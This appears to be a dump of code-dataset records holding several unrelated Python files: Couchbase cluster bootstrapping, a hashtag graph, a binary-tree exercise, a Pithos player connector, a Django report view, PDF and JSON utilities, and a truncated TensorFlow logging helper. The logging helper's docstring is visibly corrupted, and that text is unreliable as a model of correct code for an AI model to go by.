\"8091\"\ncouchbase_cli_abs_path = os.path.join(\n couchbase_server_bin_path,\n \"couchbase-cli\",\n)\ncouchbase_server_bucket_type = \"couchbase\"\ncouchbase_server_bucket_replica = 1\n \nclass CouchbaseCluster:\n\n def __init__(self, cluster_id, node_ip_addr_or_hostname=\"\"):\n self.cluster_id = cluster_id\n self.node_ip_addr_or_hostname = node_ip_addr_or_hostname\n\n def SetAdminCredentials(self, admin_user, admin_pass):\n self.admin_user = admin_user\n self.admin_pass = admin_pass\n \n \n def CreateOrJoin(self):\n\n \"\"\"\n Call out to cbbootstrap REST API with cluster_id and hostname\n Depending on response, either create new cluster or join existing\n \"\"\"\n\n self.CBBootstrapCreateOrJoin()\n if self.is_initial_node:\n self.Create()\n else:\n self.Join()\n\n\n def CBBootstrapCreateOrJoin(self):\n \"\"\"\n Call out to the cbbootrap REST API and do a POST request to create or join\n a cluster\n \"\"\"\n\n # POST request\n params = {\n 'cluster_id': self.cluster_id,\n 'node_ip_addr_or_hostname': self.node_ip_addr_or_hostname,\n }\n req = urllib2.Request(CBBOOTSTRAP_API_URL,\n headers = {\n \"Content-Type\": \"application/json\",\n },\n data = json.dumps(params), # Since adding data, automatically makes it a POST request\n )\n response = urllib2.urlopen(req)\n self.__cbbootstrap_load_properties_from_json_response(response)\n\n\n\n def CBBootstrapGetClusterInfo(self):\n \"\"\"\n Given a cluster_id, query the cbbootrap rest API and find IP addr or hostname\n of initial couchbase server node\n \"\"\"\n\n # POST request\n params = {\n 'cluster_id': self.cluster_id,\n }\n url = \"{}/get_status\".format(CBBOOTSTRAP_API_URL)\n req = 
urllib2.Request(url,\n headers={\n \"Content-Type\": \"application/json\",\n },\n data=json.dumps(params), # Since adding data, automatically makes it a POST request\n )\n response = urllib2.urlopen(req)\n self.__cbbootstrap_load_properties_from_json_response(response)\n\n\n def CBBootstrapGetClusterInfoRetry(self):\n self.Retry(self.CBBootstrapGetClusterInfo)\n\n def __cbbootstrap_load_properties_from_json_response(self, json_response):\n\n data = json.load(json_response)\n print(\"Server response: {}\".format(data))\n self.cluster_id = data[\"cluster_id\"]\n self.initial_node_ip_addr_or_hostname = data[\"initial_node_ip_addr_or_hostname\"]\n self.is_initial_node = data[\"is_initial_node\"]\n\n\n def Create(self):\n\n self.WaitUntilLocalCouchbaseServerRunning()\n \n self.ClusterInitRetry()\n\n # This is to prevent node-init failures if we try to call\n # node-init \"too soon\". Since node-init hasn't been called, the\n # server-list command will return:\n # ns_1@127.0.0.1 172.31.21.40:8091 healthy active\n self.WaitUntilNodeHealthy(\"127.0.0.1\")\n\n # Workaround attempt for https://issues.couchbase.com/browse/MB-23079\n time.sleep(2)\n\n self.NodeInitRetry()\n \n def ClusterInit(self):\n\n subprocess_args = [\n couchbase_cli_abs_path,\n \"cluster-init\",\n \"-c\",\n \"{}:{}\".format(self.node_ip_addr_or_hostname, couchbase_server_admin_port),\n \"--user={}\".format(self.admin_user),\n \"--password={}\".format(self.admin_pass),\n \"--cluster-port={}\".format(couchbase_server_admin_port),\n \"--cluster-ramsize={}\".format(self._get_effective_ram_mb()),\n \"--services=data\",\n ]\n \n exec_subprocess(subprocess_args)\n\n\n def WaitUntilLocalCouchbaseServerRunning(self):\n self.Retry(self.LocalCouchbaseServerRunningOrRaise)\n\n def LocalCouchbaseServerRunningOrRaise(self):\n urllib2.urlopen('http://{}:{}'.format(self.node_ip_addr_or_hostname, couchbase_server_admin_port))\n \n def WaitUntilNodeHealthy(self, node_ip):\n def f():\n self.NodeHealthyOrRaise(node_ip)\n \n self.Retry(f)\n\n def NodeHealthyOrRaise(self, node_ip):\n subprocess_args = [\n couchbase_cli_abs_path,\n \"server-list\",\n \"-c\",\n \"{}:{}\".format(self.initial_node_ip_addr_or_hostname, couchbase_server_admin_port),\n \"--user={}\".format(self.admin_user),\n \"--password={}\".format(self.admin_pass),\n ]\n output = exec_subprocess(subprocess_args)\n if node_ip not in output:\n raise Exception(\"Did not find {} in {}\".format(node_ip, output))\n if \"unhealthy\" in output:\n raise Exception(\"Some nodes appear to be unhealthy: {}\".format(output))\n \n def NodeInit(self):\n\n subprocess_args = [\n couchbase_cli_abs_path,\n \"node-init\",\n \"-c\",\n \"{}:{}\".format(self.node_ip_addr_or_hostname, couchbase_server_admin_port),\n \"--user={}\".format(self.admin_user),\n \"--password={}\".format(self.admin_pass),\n \"--node-init-hostname={}\".format(self.node_ip_addr_or_hostname),\n ]\n \n exec_subprocess(subprocess_args)\n\n\n def Retry(self, method):\n max_retries = 10\n for i in range(max_retries):\n\n try:\n method()\n return \n except Exception as e:\n print(\"Got exception running {}. 
Will retry\".format(e))\n \n time.sleep(10)\n\n raise Exception(\"Gave up trying to run {}\".format(method))\n\n def ClusterInitRetry(self):\n self.Retry(self.ClusterInit)\n\n def NodeInitRetry(self):\n self.Retry(self.NodeInit)\n\n def CreateRetry(self):\n self.Retry(self.Create)\n \n def JoinRetry(self):\n self.Retry(self.Join)\n\n def RebalanceRetry(self):\n self.Retry(self.Rebalance)\n \n def Join(self):\n \n self.WaitUntilLocalCouchbaseServerRunning()\n \n self.WaitUntilNodeHealthy(self.initial_node_ip_addr_or_hostname) \n self.ServerAddRetry()\n self.WaitForNoRebalanceRunning()\n self.RebalanceRetry()\n\n def ServerAddRetry(self):\n self.Retry(self.ServerAdd)\n \n def ServerAdd(self):\n\n subprocess_args = [\n couchbase_cli_abs_path,\n \"server-add\",\n \"-c\",\n \"{}:{}\".format(self.initial_node_ip_addr_or_hostname, couchbase_server_admin_port),\n \"--user={}\".format(self.admin_user),\n \"--password={}\".format(self.admin_pass),\n \"--server-add={}\".format(self.node_ip_addr_or_hostname),\n \"--server-add-username={}\".format(self.admin_user),\n \"--server-add-password={}\".format(self.admin_pass),\n ]\n \n exec_subprocess(subprocess_args)\n\n def WaitForNoRebalanceRunning(self):\n max_retries = 200\n for i in range(max_retries):\n \n if not self.IsRebalanceRunning():\n print(\"No rebalance running. Finished waiting\")\n return \n\n print(\"Rebalance running, waiting 10 seconds\")\n time.sleep(10)\n\n def IsRebalanceRunning(self):\n \n subprocess_args = [\n couchbase_cli_abs_path,\n \"rebalance-status\",\n \"-c\",\n \"{}:{}\".format(self.initial_node_ip_addr_or_hostname, couchbase_server_admin_port),\n \"--user={}\".format(self.admin_user),\n \"--password={}\".format(self.admin_pass),\n ]\n \n output = exec_subprocess(subprocess_args)\n\n if \"notRunning\" in output:\n return False\n elif \"running\" in output:\n return True\n\n print(\"Warning: unexpected output for rebalance-status: {}\".format(output))\n\n return False \n \n \n def Rebalance(self):\n\n subprocess_args = [\n couchbase_cli_abs_path,\n \"rebalance\",\n \"-c\",\n \"{}:{}\".format(self.initial_node_ip_addr_or_hostname, couchbase_server_admin_port),\n \"--user={}\".format(self.admin_user),\n \"--password={}\".format(self.admin_pass),\n ]\n \n exec_subprocess(subprocess_args)\n\n def _get_total_ram_mb(self):\n \"\"\"\n Get total ram -- taken from http://stackoverflow.com/questions/22102999/get-total-physical-memory-in-python\n \"\"\"\n\n mem_bytes = os.sysconf('SC_PAGE_SIZE') * os.sysconf('SC_PHYS_PAGES') # e.g. 4015976448\n total_avail_ram_mb = mem_bytes / (1024. 
** 2)\n\n print(\"total_avail_ram_mb: {}\".format(total_avail_ram_mb))\n return total_avail_ram_mb\n\n def _get_effective_ram_mb(self):\n \"\"\" Return the amount of effective RAM ((total RAM * muliplier) - n1ql ram allocation)\n Given a total amount of ram\n\n TODO: duplicated from mobile-testkit couchbaseserver.py -- should be consolidated\n\n \"\"\"\n\n # Leave 20% of RAM available for the underlying OS\n ram_multiplier = 0.80\n\n total_ram_mb = self._get_total_ram_mb()\n effective_avail_ram_mb = int(total_ram_mb * ram_multiplier)\n\n print(\"effective_avail_ram_mb: {}\".format(effective_avail_ram_mb))\n return effective_avail_ram_mb\n\n def AddBucket(self, bucket_name, bucket_percent_ram):\n\n if not self.is_initial_node:\n print(\"Skipping adding bucket since this is not the initial node\")\n return\n\n # Tries to avoid errors: \"Cannot create buckets during rebalance\"\n self.WaitForNoRebalanceRunning()\n \n if bucket_percent_ram < 0.0 or bucket_percent_ram > 1.0:\n raise Exception(\"invalid bucket_percent_ram: {}\".format(bucket_percent_ram))\n \n bucket_ramsize = self._get_effective_ram_mb() * bucket_percent_ram\n\n subprocess_args = [\n couchbase_cli_abs_path,\n \"bucket-create\",\n \"-c\",\n \"{}:{}\".format(self.initial_node_ip_addr_or_hostname, couchbase_server_admin_port),\n \"--user={}\".format(self.admin_user),\n \"--password={}\".format(self.admin_pass),\n \"--bucket-type={}\".format(couchbase_server_bucket_type),\n \"--bucket={}\".format(bucket_name),\n \"--bucket-ramsize={}\".format(int(bucket_ramsize)),\n \"--bucket-replica={}\".format(couchbase_server_bucket_replica),\n \"--wait\"\n ]\n \n exec_subprocess(subprocess_args)\n \n\ndef exec_subprocess(subprocess_args):\n print(\"Calling Couchbase CLI with {}\".format(\" \".join(subprocess_args)))\n \n try:\n output = subprocess.check_output(subprocess_args, stderr=subprocess.STDOUT)\n print(output)\n return output \n except subprocess.CalledProcessError as e:\n print(\n \"Error calling subprocess with {}. Return code: {}. Output: {}\".format(\n subprocess_args,\n e.returncode,\n e.output\n )\n )\n raise e\n\ndef discover_initial_couchbase_server_ip(cluster_id):\n \"\"\"\n Given a cluster-id, discover the ip address or hostname of the initial couchbase server node IP address.\n This will do a back off retry several times to wait for it to become available\n \"\"\"\n\n cbCluster = CouchbaseCluster(\n cluster_id=cluster_id,\n )\n cbCluster.CBBootstrapGetClusterInfoRetry()\n return cbCluster.initial_node_ip_addr_or_hostname\n\n \n\ndef main():\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--cluster-id\",\n help=\"The cluster-id to use for cbbootstrap. 
Should be as unique as possible, for example like an AWS stack ID ran through base64\",\n required=True)\n parser.add_argument(\"--node-ip-addr-or-hostname\",\n help=\"The ip address or hostname that will be recorded so that other couchbase servers or other components can connect to this node if it becomes initial node\",\n required=True)\n parser.add_argument(\"--admin-user\",\n help=\"The username of the Couchbase Server admin user to create or connect as\",\n required=True)\n parser.add_argument(\"--admin-pass\",\n help=\"The password of the Couchbase Server admin user to create or connect as\",\n required=True)\n\n args = parser.parse_args()\n\n\n print(\"{} called with cluster_id {}, node_ip_addr_or_hostname {}, admin user {}\".format(\n sys.argv[0],\n args.cluster_id,\n args.node_ip_addr_or_hostname,\n args.admin_user,\n ))\n\n cbCluster = CouchbaseCluster(\n cluster_id=args.cluster_id,\n node_ip_addr_or_hostname=args.node_ip_addr_or_hostname,\n )\n cbCluster.SetAdminCredentials(\n admin_user=args.admin_user,\n admin_pass=args.admin_pass,\n )\n\n # Call out to cbbootstrap API to figure out whether to create or join, then actually create or join\n cbCluster.CreateOrJoin()\n\n # Create buckets (TODO: these should be CLI arguments)\n cbCluster.AddBucket(\"data-bucket\", 0.50)\n cbCluster.AddBucket(\"index-bucket\", 0.50)\n\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"couchbase/sync-gateway-ami","sub_path":"src/cbbootstrap.py","file_name":"cbbootstrap.py","file_ext":"py","file_size_in_byte":14186,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"36431169044","text":"from words import word_add_array_hashtag\nfrom words import check_ascii\nfrom words import word_add\nfrom words import word_clean\nfrom words import word_print\nfrom words import words_ret_hist\nfrom words import words_delete_all\n\nfrom db import db_get_all_users\nfrom db import db_get_tweets_in_last_time\n\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom db import db_set_mariadb_connection\nfrom db import db_get_mariadb_cursor\n\ndef hashtag_get_most_used(cursor,delta=172800/2):\n\twords_delete_all()\n\tusers=db_get_all_users(cursor)\n\ttweets=[]\n\tfor u in users:\n\t\ttweets=db_get_tweets_in_last_time(cursor,u,delta=delta)\n\t\tfor i in range(0,len(tweets)):\n\t\t\tword_add_array_hashtag(tweets[i])\n\n\tword_clean()\n\tnames,values=words_ret_hist()\n\n\tfile = open(\"word_usage.txt\",\"w\") \n\n\tfor i in range(0,len(names)):\n\t\tfile.write(names[i]+\"\\n\") \n\n\tfile.close()\n\n\treturn names,values\n\ndef hashtag_usage_graph(cursor):\n\tprint(\"making hashtag graph\")\n\tnames,values=hashtag_get_most_used(cursor,delta=100*24*60*60)\n\tnames=names[:20]\n\tvalues=values[:20]\n\tnames.reverse()\n\tvalues.reverse()\n\t#word_print()\n\n\ty_pos = np.arange(len(names))\n\n\tmatplotlib.rcParams['font.family'] = 'Open Sans'\n\n\tplt.figure() #,dpi=300 figsize=(25.0, 16.0)\n\n\tax = plt.subplot(111)\n\tax.spines['right'].set_visible(False)\n\tax.spines['top'].set_visible(False)\n\n\tbars=plt.barh(y_pos, values, align='center',color=\"#36845b\",alpha=0.8)\n\n\tplt.yticks(y_pos, names)\n\tplt.xlabel('Usage')\n\tplt.xticks(rotation='vertical')\n\tplt.savefig('hashtag_usage_graph.png', bbox_inches='tight')\n\tprint(\"saved graph\")\n\n\nif __name__ == '__main__':\n\tdb_set_mariadb_connection()\n\tcursor = 
db_get_mariadb_cursor()\n\thashtag_usage_graph(cursor)\n\n","repo_name":"roderickmackenzie/mpstweets","sub_path":"hashtag_usage_graph.py","file_name":"hashtag_usage_graph.py","file_ext":"py","file_size_in_byte":1714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"15746357494","text":"\"\"\" \nBinary Tree Upside Down\nFor example: \nGiven a binary tree: \n 1\n / \\\n 2 3\n / \\\n4 5\nReturn the root of the new binary tree: \n 4\n / \\\n5 2\n / \\\n 3 1\n\n\"\"\" \n\n# defintion of tree node \nclass TreeNode(): \n def __init__(self, x): \n self.val = x\n self.left = None \n self.right = None \n \n# top down approach \ndef UpsideDownBinaryTree(root): \n p = root \n parent, parentRight = None, None \n while(p != None): \n left = p.left\n p.left = parentRight \n parentRight = p.right \n p.right = parent \n parent = p\n p = left \n return parent \n\n# bottom up approach \ndef UpsideDownBinaryTree(root): \n return BottomUp(root, None) \n \ndef BottomUp(p, parent): \n if(p == None): return parent \n root = BottomUp(p.left, p) \n p.left = parent.right if parent else parent \n p.right = parent \n return root \n \n \n\n","repo_name":"lvncnt/Leetcode-OJ","sub_path":"Binary-Tree/python/Binary-Tree-Upside-Down.py","file_name":"Binary-Tree-Upside-Down.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"27497434254","text":"from __future__ import absolute_import\n\nimport panflute.daemon.connector\nimport panflute.daemon.mpris\nimport panflute.mpris\n\nimport dbus\n\n\nclass Connector (panflute.daemon.connector.DBusConnector):\n \"\"\"\n Connection manager for Pithos.\n \"\"\"\n\n def __init__ (self):\n panflute.daemon.connector.DBusConnector.__init__ (self, \"pithos\", \"Pithos\",\n \"net.kevinmehall.Pithos\")\n # Pithos's icon isn't put into a common directory\n\n\n def root (self, **kwargs):\n return panflute.daemon.mpris.Root (\"Pithos\", **kwargs)\n\n\n def track_list (self, **kwargs):\n return panflute.daemon.mpris.TrackList (**kwargs)\n\n\n def player (self, **kwargs):\n return Player (**kwargs)\n\n\nclass Player (panflute.daemon.mpris.Player):\n \"\"\"\n Player object for Pithos.\n \"\"\"\n\n from panflute.util import log\n\n\n def __init__ (self, **kwargs):\n panflute.daemon.mpris.Player.__init__ (self, **kwargs)\n for feature in [\"GetCaps\", \"GetMetadata\", \"GetStatus\",\n \"Next\", \"Pause\", \"Stop\", \"Play\"]:\n self.register_feature (feature)\n\n bus = dbus.SessionBus ()\n proxy = bus.get_object (\"net.kevinmehall.Pithos\", \"/net/kevinmehall/Pithos\")\n self.__pithos = dbus.Interface (proxy, \"net.kevinmehall.Pithos\")\n\n self.cached_caps.all = panflute.mpris.CAN_GO_NEXT | \\\n panflute.mpris.CAN_PAUSE | \\\n panflute.mpris.CAN_PLAY | \\\n panflute.mpris.CAN_PROVIDE_METADATA\n\n self.__handlers = [\n self.__pithos.connect_to_signal (\"PlayStateChanged\", self.__play_state_changed_cb),\n self.__pithos.connect_to_signal (\"SongChanged\", self.__song_changed_cb)\n ]\n\n self.__pithos.IsPlaying (reply_handler = self.__play_state_changed_cb,\n error_handler = self.log.warn)\n self.__pithos.GetCurrentSong (reply_handler = self.__song_changed_cb,\n error_handler = self.log.warn)\n\n\n def remove_from_connection (self):\n for handler in self.__handlers:\n handler.remove ()\n self.__handlers = []\n\n panflute.daemon.mpris.Player.remove_from_connection (self)\n\n\n def do_Next (self):\n self.__pithos.SkipSong (reply_handler = 
lambda: None,\n error_handler = self.log.warn)\n\n\n def do_Pause (self):\n if self.cached_status.state == panflute.mpris.STATE_PLAYING:\n self.__pithos.PlayPause (reply_handler = lambda: None,\n error_handler = self.log.warn)\n\n\n def do_Stop (self):\n self.do_Pause ()\n\n\n def do_Play (self):\n if self.cached_status.state != panflute.mpris.STATE_PLAYING:\n self.__pithos.PlayPause (reply_handler = lambda: None,\n error_handler = self.log.warn)\n\n\n def __play_state_changed_cb (self, playing):\n \"\"\"\n Called when the playback state changes.\n \"\"\"\n\n if playing:\n self.cached_status.state = panflute.mpris.STATE_PLAYING\n else:\n self.cached_status.state = panflute.mpris.STATE_PAUSED\n\n\n def __song_changed_cb (self, song):\n \"\"\"\n Called when the current song changes.\n \"\"\"\n\n self.log.debug (\"New song: {0}\".format (song))\n if song is not None and len (song) > 0:\n metadata = {}\n if \"title\" in song:\n metadata[\"title\"] = song[\"title\"]\n if \"artist\" in song:\n metadata[\"artist\"] = song[\"artist\"]\n if \"album\" in song:\n metadata[\"album\"] = song[\"album\"]\n if \"songDetailURL\" in song:\n metadata[\"location\"] = song[\"songDetailURL\"]\n self.cached_metadata = metadata\n else:\n self.cached_metadata = {}\n","repo_name":"benpicco/mate-panflute","sub_path":"src/panflute/daemon/pithos.py","file_name":"pithos.py","file_ext":"py","file_size_in_byte":3987,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"4191890265","text":"\"\"\"Configuration constants\"\"\"\n\nimport locale\nfrom typing import List\n\ndef _unique(data_list: List[str]) -> List[str]:\n return_list: List[str] = []\n for cat in data_list:\n if cat not in return_list:\n return_list.append(cat)\n\n return return_list\n\nDATE_FORMAT = \"%m/%d/%Y\" # the format for date print\nTHOUSAND_SEP = True # whether the amount has a thousands separator\nLOCALE = locale.LC_ALL # the local to use for currency print\nUSE_SQL = False # determines whether to use SQL or XML\nFILE_NAME = \"2021.xml\" # the XML file name\nDB_NAME = \"checkbook.db\" # the SQL database file name\nDEBIT_CATEGORIES = [\"Groceries\", \"Gas\", \"Bills\", \"Entertainment\", \"Food\", \"Savings\", \"Good Time\",\"Vacation\",\"Christmas\", \"Wedding\", \"Medical\",\"Whiskey\", \"Other\"]\nCREDIT_CATEGORIES = [\"Bills\", \"Other\", \"Paycheck\"]\nCATEGORIES = _unique(DEBIT_CATEGORIES + CREDIT_CATEGORIES) # Categories to choose for transactions\nCATEGORIES_FOR_ADD = {\"Debit\": DEBIT_CATEGORIES, \"Credit\": CREDIT_CATEGORIES, \"all\": CATEGORIES}\nDEBIT_MULTIPLIER = -1\nSORT_BY_KEY = \"Date\"\n","repo_name":"amkirby/Checkbook","sub_path":"Constants/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"41950322680","text":"import datetime\nimport json\nfrom django.shortcuts import render\nfrom django.views.decorators.http import require_POST\nfrom django.http import Http404, JsonResponse\nfrom django.contrib.auth.decorators import login_required\nfrom django.forms.models import model_to_dict\nfrom common.models import Product\nfrom contacts.models import Contact\nfrom accounts.models import Account\nfrom bills.models import Bill\nfrom spend.models import Spend\n\n# Create your views here.\ndef get_early_date(dates):\n print(\"get_early_data#######\")\n print(dates)\n return min(dates)\n\ndef gen_trend_data(data, sdate, step):\n now = 
datetime.datetime.now().date()\n \n summary = {}\n data_trend = []\n if step == 7:\n sdate = sdate - datetime.timedelta(days=sdate.weekday())\n edate = now + datetime.timedelta(days=6-now.weekday())\n elif step == 30:\n sdate = datetime.date(sdate.year, sdate.month, 1)\n edate = datetime.date(now.year, now.month + 1, 1) - datetime.timedelta(days=1)\n else:\n edate = now + datetime.timedelta(days=step)\n date = sdate\n while date <= edate:\n element = {'date':date.strftime(\"%Y-%m-%d\")}\n profit = 0\n for key in data.keys():\n dlist = data[key]\n idx = 0\n amount = 0\n #print(key) \n for i in range(len(dlist)):\n if dlist[i].created_on.date() > date:\n break\n amount += dlist[i].amount\n if 'total' in key:\n #print(\"found total\")\n profit += (dlist[i].price - dlist[i].product.cost)*dlist[i].quantity\n #print(profit)\n idx = i+1\n #idx = accounts.index(account)\n del dlist[0:idx]\n element[key] = amount\n \n\n if key in summary.keys():\n summary[key] += amount\n else:\n summary[key] = amount\n #print(element)\n element['profit'] = profit\n data_trend.append(element)\n date = date + datetime.timedelta(days=step)\n return data_trend, summary\n\n@login_required\ndef report(request):\n contact_detail = []\n spend_detail = []\n summary = {'total': 0, 'paid': 0, 'remain': 0, 'spend':0, 'paid_percent':0, 'remain_percent':0, 'profit':0}\n if request.method == \"GET\":\n step = 1\n \n contacts = Contact.objects.all().order_by(\"created_on\")\n for contact in contacts:\n aclist = Account.objects.filter(contacts=contact).values_list('amount', flat=True)\n blist = Bill.objects.filter(contact=contact).values_list('amount', flat=True)\n total = sum(aclist)\n paid = sum(blist)\n if total != 0:\n contact_detail.append({'id':contact.id, 'name':contact.name, 'total': total, 'remain':round((total-paid)/total*100,2), 'paid':round((paid)/total*100,2)})\n else:\n contact_detail.append({'id':contact.id, 'name':contact.name, 'total': 0, 'remain':0, 'paid':0})\n products = Product.objects.all()\n for product in products:\n spend_list = Spend.objects.filter(product=product).values_list('amount', flat=True)\n spend_detail.append({'name':product.name, 'total':sum(spend_list)})\n else:\n sdict = {'1':1, '2':7,'3':30,'4':360}\n key = request.POST.get('step')\n if key in sdict.keys():\n step = sdict[key]\n else:\n raise Http404(\"Not support step\")\n\n\n\n data_trend = [] \n total = 0\n cost = 0\n amount = 0\n \n accounts = Account.objects.all().order_by(\"created_on\")\n bills = Bill.objects.all().order_by(\"created_on\") \n spends = Spend.objects.all().order_by(\"created_on\") \n freight = Spend.objects.filter(product__name__contains='运费').order_by(\"created_on\") \n accounts = list(accounts)\n bills = list(bills)\n spends = list(spends)\n freight = list(freight)\n print(freight)\n sdate = None\n dates = []\n if len(bills):\n dates.append(bills[0].created_on.date())\n if len(spends):\n dates.append(spends[0].created_on.date())\n if len(accounts):\n dates.append(accounts[0].created_on.date())\n sdate = min(dates)\n \n if sdate:\n data = {'total': accounts, 'paid': bills, 'spend':spends, 'freight':freight}\n data_trend, summary = gen_trend_data(data, sdate, step)\n summary['remain'] = summary['total'] - summary['paid']\n summary['profit'] = 0\n profit_list = Account.objects.values_list('product__cost', 'price', 'quantity')\n for i in data_trend:\n if i['profit'] != 0:\n print(\"%s %d\"%(i['date'],i['profit']))\n for element in list(profit_list):\n summary['profit'] += (element[1] - element[0])*element[2]\n\n 
context_data = {\n 'summary':summary,\n 'data_trend': json.dumps(data_trend),\n 'contacts': contact_detail,\n 'spends': json.dumps(spend_detail)\n }\n else:\n context_data = {\n 'summary':summary,\n 'data_trend': [],\n 'contacts': contact_detail,\n 'spends': spend_detail\n }\n\n print(context_data)\n if request.method == \"GET\":\n return render(request, 'report.html', context_data)\n else:\n print(\"return POST data\")\n print(data_trend)\n return JsonResponse({'result': data_trend, 'ok':1})\n\n@require_POST\ndef get_contact_trend(request):\n id = request.POST.get('id')\n step = int(request.POST.get('step'))\n if id:\n contact = Contact.objects.get(pk=id)\n print(contact)\n accounts = Account.objects.filter(contacts=contact).order_by(\"created_on\")\n bills = Bill.objects.filter(contact=contact).order_by(\"created_on\")\n print(accounts)\n print(bills)\n accounts = list(accounts)\n bills = list(bills)\n dates = []\n dates.append(datetime.datetime.now().date())\n if len(bills):\n dates.append(bills[0].created_on.date())\n if len(accounts):\n dates.append(accounts[0].created_on.date())\n print(model_to_dict(accounts[0]))\n sdate = get_early_date(dates)\n data = {'total': accounts, 'paid': bills}\n data_trend, summary = gen_trend_data(data, sdate, step)\n #summary['remain'] = summary['total'] - summary['paid']\n return JsonResponse({'result': data_trend, 'ok':1})\n else:\n return JsonResponse({'ok':0})","repo_name":"sordhlm/dj_css","sub_path":"report/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"13596383191","text":"import PyPDF2 as pdf\nname=input(\"Enter the file name (With extension)\")\np=name[-3::]\nprint()\nif(p==\"pdf\"):\n pdf_name=open(name,'rb')\n pdf_obj=pdf.PdfFileReader(pdf_name)\n with open(\"extracted_data.txt\",\"w\") as f:\n for i in range(pdf_obj.getNumPages()):\n data=pdf_obj.getPage(i).extractText()\n f.write(data)\n f.write(\"\\n\")\n f=open(\"extracted_data.txt\",\"r\")\n contents=f.read()\n f.close()\n print(contents)\n\nelif(p==\"txt\"):\n print(\"This is a text file\")\n myfile=open(name,\"rt\")\n contents=myfile.read()\n myfile.close()\n print(contents) \n\nelse:\n print(\"The input file is not in pdf or text format\")\n\n","repo_name":"sumukhhk/HPE","sub_path":"pypdf2.py","file_name":"pypdf2.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24453545922","text":"# naprawa kodowania pobranego json'a\r\n# plik do poprawy jako argumenty w skrypcie w CMD | | skrypt.py plik1.json\r\nimport json\r\nimport sys\r\n\r\n# sprawdzenie czy argumenty podane\r\nif len(sys.argv) != 2:\r\n exit(\"Niepoprawna ilość argumentów, potrzebny jest jeden\")\r\n\r\nfriends_file = open(sys.argv[1], mode=\"r\")\r\n# print(friends_file) # sprawdzenie kodowania cp1250, utf8\r\ndata_friends = json.load(friends_file)\r\nfriends_file.close()\r\ndata_friends_fixed = data_friends.copy()\r\n\r\n# poprawa kodowania\r\nfor x, y in enumerate(data_friends[\"friends_v2\"]):\r\n data_friends_fixed[\"friends_v2\"][x][\"name\"] = y[\"name\"].encode(\"latin1\").decode(\"utf8\")\r\n\r\n# nowa nazwa pliku | uzyte string[:-5]\r\nnew_file_name = (sys.argv[1])[:-5] + \"_fixed.json\"\r\n\r\n# zapis poprawionego pliku json\r\nwith open(new_file_name, \"w\", encoding=\"utf8\") as file:\r\n json.dump(data_friends_fixed, file, ensure_ascii=False, indent=2)\r\n\r\nprint(\"Zapisano 
do pliku:\", new_file_name)\r\n\r\n","repo_name":"kam7il/unfriend-FB-finder","sub_path":"G_fejsFrendy_fix_encode_json_v1_1.py","file_name":"G_fejsFrendy_fix_encode_json_v1_1.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"27640189803","text":"import os\n\nfrom types import FunctionType\nfrom typing import List\nfrom typing import Iterable\nfrom typing import Tuple\n\nimport numpy as np\nimport tensorflow.compat.v1 as tf\n\nfrom colorama import init, Fore\nfrom astropy.io import fits\n\ninit(autoreset=True)\n\n\nclass TFLogger:\n \"\"\"A helper class to color the logging text in TensorFlow.\"\"\"\n\n RED = lambda s: Fore.RED + str(s) + Fore.RESET\n BLUE = lambda s: Fore.BLUE + str(s) + Fore.RESET\n YELLOW = lambda s: Fore.YELLOW + str(s) + Fore.RESET\n GREEN = lambda s: Fore.GREEN + str(s) + Fore.RESET\n LIGHTRED = lambda s: Fore.LIGHTRED_EX + str(s) + Fore.RESET\n\n @staticmethod\n def info(msg: str) -> None:\n \"\"\"Log at info level in green.\n\n @staticmethod\n @staticmethodgged\n @staticmethod\n Returns:\n None\n \"\"\"\n tf.logging.info(TFLogger.GREEN(msg))\n\n @staticmethod\n def debug(msg: str) -> None:\n \"\"\"Log at debug level in yellow.\n\n Args:\n msg (str): The string to be logged\n\n Returns:\n None\n \"\"\"\n tf.logging.debug(TFLogger.YELLOW(msg))\n\n @staticmethod\n def warn(msg: str) -> None:\n \"\"\"Log at warn level in lightred.\n\n Args:\n msg (str): The string to be logged\n\n Returns:\n None\n \"\"\"\n tf.logging.warning(TFLogger.LIGHTRED(msg))\n\n @staticmethod\n def error(msg: str):\n \"\"\"Log at error level in red.\n\n Args:\n msg (str): The string to be logged\n\n Returns:\n None\n \"\"\"\n tf.logging.error(TFLogger.RED(msg))\n\n @staticmethod\n def tensor_shape(tensor: tf.Tensor, log_func=None, format_str=\"[{}]::{}\") -> None:\n \"\"\"Log the the shape of tensor 't'.\n\n Args:\n tensor (tf.Tensor): A tensorflow Tensor\n logging_func (func): logging function to to use, default\n tf_logger.debug\n format_str (str): A string that will be passed will have .format called\n on it and given two arguments in the following order:\n - tensor_name\n - tensor_shape\n Returns:\n None\n \"\"\"\n if log_func is None:\n log_func = TFLogger.debug\n\n log_func(format_str.format(tensor.name, tensor.shape.as_list()))\n\n\nclass OptionalFunc:\n \"\"\"Descriptor protocol for functions that don't have to overriden.\n\n This is a helper class that is used to stub methods that don't have to\n be overridden.\n \"\"\"\n\n def placeholder(self, *args):\n \"\"\"Placeholder function used as default in __init__\"\"\"\n return list(args)\n\n def __init__(self, warn_msg: str, init_func: FunctionType = None):\n \"\"\"\"\"\"\n self._warn_msg = warn_msg\n self._func = init_func if init_func else self.placeholder\n self._is_default = True\n\n def __get__(\n self, obj, type=None # pylint: disable=redefined-builtin\n ) -> FunctionType:\n if self._is_default:\n TFLogger.warn(self._warn_msg)\n\n return 